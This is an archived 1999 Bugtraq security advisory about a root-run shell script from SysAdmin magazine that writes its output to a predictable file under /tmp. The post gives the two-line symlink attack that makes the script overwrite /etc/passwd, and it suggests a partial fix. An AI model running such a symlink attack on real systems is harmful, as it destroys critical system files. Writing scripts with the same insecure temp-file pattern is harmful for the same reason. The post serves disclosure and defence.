Date: Mon, 4 Jan 1999 02:33:46 -0800 From: "Jan B. Koum" <jkb@BEST.COM> To: BUGTRAQ@netspace.org Subject: January SysAdmin EY script DoS bug. /* Warning! Lame bug report ahead. */ /* This is nothing against EY. They are a good company. This is against people who claim to be security experts and can't write a secure script. */ Lets make it short. SysAdmin (www.samag.com - btw, their DNS is brocken. Isn't it ironic that they can't get their own systems running, yet they teach others how) magazine published a script in Jan 1999 issue which, after you run it as root, tells you stuff about your system. Here are some parts of this script: set HOSTNAME=`hostname` set basedir=/tmp/eyscan set OUTPUT=?{basedir}/ey-?{HOSTNAME}.out After that, output like 'ls -l /etc/passwd' is sent to $OUTFILE. So you know that your admin runs lame scripts as root and what do you do? Hmm.. gee.. % mkdir /tmp/eyscan % ln -s /etc/passwd /tmp/eyscan/ey-`hostname`.out After an admin runs the script - he is toasted. A points to this story kids: o set basedir=/root or /var/run .. -- Yan
Security bug in a shell script in January issue of SysAdmin Magazine
By
Get the Free Newsletter!
Subscribe to Developer Insider for top news, trends, & analysis